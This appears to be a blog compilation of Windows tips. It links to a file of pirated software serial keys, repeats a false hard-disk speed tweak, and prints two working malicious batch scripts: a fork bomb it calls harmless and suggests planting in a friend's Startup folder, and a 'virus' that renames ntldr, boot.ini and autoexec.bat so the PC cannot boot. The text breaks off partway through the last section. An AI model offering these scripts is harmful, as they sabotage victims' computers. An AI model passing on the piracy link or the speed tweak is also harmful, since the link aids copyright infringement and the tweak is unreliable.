1 MILLION SERIAL KEYS

Well here is a compilation of over 1 Million serial keys of the most commonly used softwares .All hav them are genuine ,however sum of them may be blacklisted that is ..if you update the software after installing it with those keys it will be freezed.However there no harm in trying

Here is the download link

http://www.ziddu.com/download/4352414/1MillionSerialNumbersbyarka.doc.html

HIDE FOLDERS IN WINDOWS

hide ur folders without the usage of folder lock :

suppose u want to hide a folder named "hello"which is in D: of ur computer

go to command prompt
start--->run--->cmd-->d:


after changing it from C: to D:

type D:/>attrib +h +s hello
the above command is to hide the folder

to show the folder

tyoe D:/>attrib -h -s abc

in this type of hidding the folder cannot be viewed even if we make advance search or even changing the folders menu to (show all hidden files)

INCREASE HARD DISK SPEED IN WINDOWS


If you like to increase/optimize your Hard Disk I/O - read/write speed without buying expensive software utilities to do that job or changing the HD, just follow next steps. With doing these steps you will increase Hard disk speed (depends of manufacture and specification, but its worth to try). The most speed improvement is visible with IDE drives; however there are reports that this tweak also does good for SCSI disks.

In any case, it won't harm your system, so try it yourself and let me know what you find!

Steps:

1. Run SYSEDIT.EXE from the start & then Run command.
2. Expand the system.ini file window.
3. Scroll down almost to the end of the file untill you find a line called [386enh].
4. Press Enter to make one blank line, and in that line type
5. Irq14=4096 (note: This line IS CASE SENSITIVE)
6. Click on the File menu, then choose Save.
7. Close SYSEDIT and reboot your computer.
8. Restart windows!

The speed improvement will be noticed just after the system reboots, any system info. software can be used to check the improvement.


MUSIC TRACK NOT SHOWING IN GOOGLE TALK STATUS


For those who were busy fighting the aliens while Google Talk added the cool feature to display your currently playing music track in the Google status, please be aware that you can simply do so just by changing the status to “Show current music track”.

Now, it so happened that I eagerly tried the feature when it was launched, but Gtalk did not show the status with Windows Media Player 10, 11 or Winamp on my PC.


On further research I discovered that Google Talk installs a plug-in in Windows Media Player which sends the current music track to Gtalk. Now if, for any reason, WMP detects some problem with a plug-in, it disables it. This was the problem in my case. So here is what I did to enable my Google Talk plug-in:


  1. Ensure that you have the latest Google Talk installed

  1. In Windows Media Player, press Alt+T to access the tools menu

  1. Press ‘Options’

  1. Click on the ‘Plug-ins’ tab

  1. On the left hand ‘Category’ pane, click on the ‘Background’ item

  1. On the right hand ‘Background’ pane, click on the Google Talk plugin to check and enable it

  1. Save changes and change the status in Google Talk to “Show current music track”


This worked for me, hope it helps you too!

Oh and by the way, Google’s fascination with collecting information in order to show us meaningful results found its way in GTalk too. Google has a service called Google Trends. If you wish, then Google can log what you listen too, and hence show meaningful trends such as the current most popular song etc. I have opted in :)

Happy chitter chatting!

Fork Bomb

This is a prank, which will make a command run over and over until the computer cannot handle any more programs and the computer will freeze or shutdown.
!!!!THIS IS HARMLESS AND WILL DO NO DAMAGE TO YOUR COMPUTER!!!!!

To make this open note pad and type:

@echo off
:START
start a.bat
GOTO START

The code above must be saved as a.bat and when the other person opens it nothing will appear but in the background it will keep opening its self until the computer freezes or shuts down.
You can try this on your friends by putting it in the Startup.

I tried this on my computer and it worked(obviosly didn't put it in my startup. I just ran it.) 

HARD DISK MONITORING SOFTWARE


Do you know how long your hard disk is going to last before u encounter a fatal Blue screen of death ?

Do you no what is the temperature of ur hard disk when u play cpu intensive games?

The answer to all these question might be no but after you go through this post it will be replaced by a YES .I stumbled upon this amazing softwares last night n believe me it works whats more it’s a freebie .its called active hard disk monitor

Active@ Hard Disk Monitor is a disk utility that checks and monitors the status of your hard drives to help prevent data loss. The system is based on the Self-Monitoring Analysis and Reporting Technology (S.M.A.R.T.).

This software monitors hard disk parameters such as Temperature, Head Flying Height and Spin-Up Time and notifies a user when a critical condition occurs. Disk Monitor also displays hard disk information, current S.M.A.R.T. attributes and the overall status of the hard disk's health.

Advanced disk scan allows you to detect bad sectors on a disk surface. The software can be launched automatically at Windows startup and monitor the system in the background. An icon in the System Tray can display the temperature for selected HDDs.

Hardware Requirements:
  • CPU: Pentium III 500MHz and higher or compatible
  • RAM: 256 MB
  • Disk space: 15 MB

DOWNLOAD LINK
http://www.ziddu.com/download/4860290/DiskMonitorFree.exe.html

NOTEPAD "world trade centre trick".. ::


Did you know that the flight number of the plane that had hit WTC ...on
9/11 was Q33N ....Open your Notepad in ur computer and type the flight
number i.e Q33N... Increase the Font Size to 72, Change the Font to
Wingdings. U will be amazed by the findings
.




VIRUS

This virus was written by one of my frnds on a orkut forum so thanks to him here it goes.


ok here's what the virus does...
But, first
BE EXTREMELY CAREFUL.. I WOULD SERIOUSLY ADVICE YOU TO NOT TO RUN THIS ON YOUR PC ATLEAST
I TAKE NO RESPONSIBILITY OF HOW YOU USE THIS CODE. THIS IS ONLY FOR TRAINING. NOTHING ELSE
my virus uses batch processing to rename the xp booting file ntldr as ntls. and boot.ini as boot.int.. and displays a message for 4 seconds. and automatically shuts down your PC (forever )..
Open notepad. and paste the following code.. save it as .bat ... any file name with extension bat ..
@echo off
attrib c:\autoexec.bat -s -h -r
ren c:\autoexec.bat aute.bit
attrib c:\ntldr -s -h -r
ren c:\ntldr ntls
attrib c:\boot.ini -s -h -r
ren c:\boot.ini bot.int
@echo off
shutdown -s -t 4 -c "Your Computer is Doomed!!!"
you can add many variations to it.. You can also use any BATCH to EXE converter to convert your file into executable one so t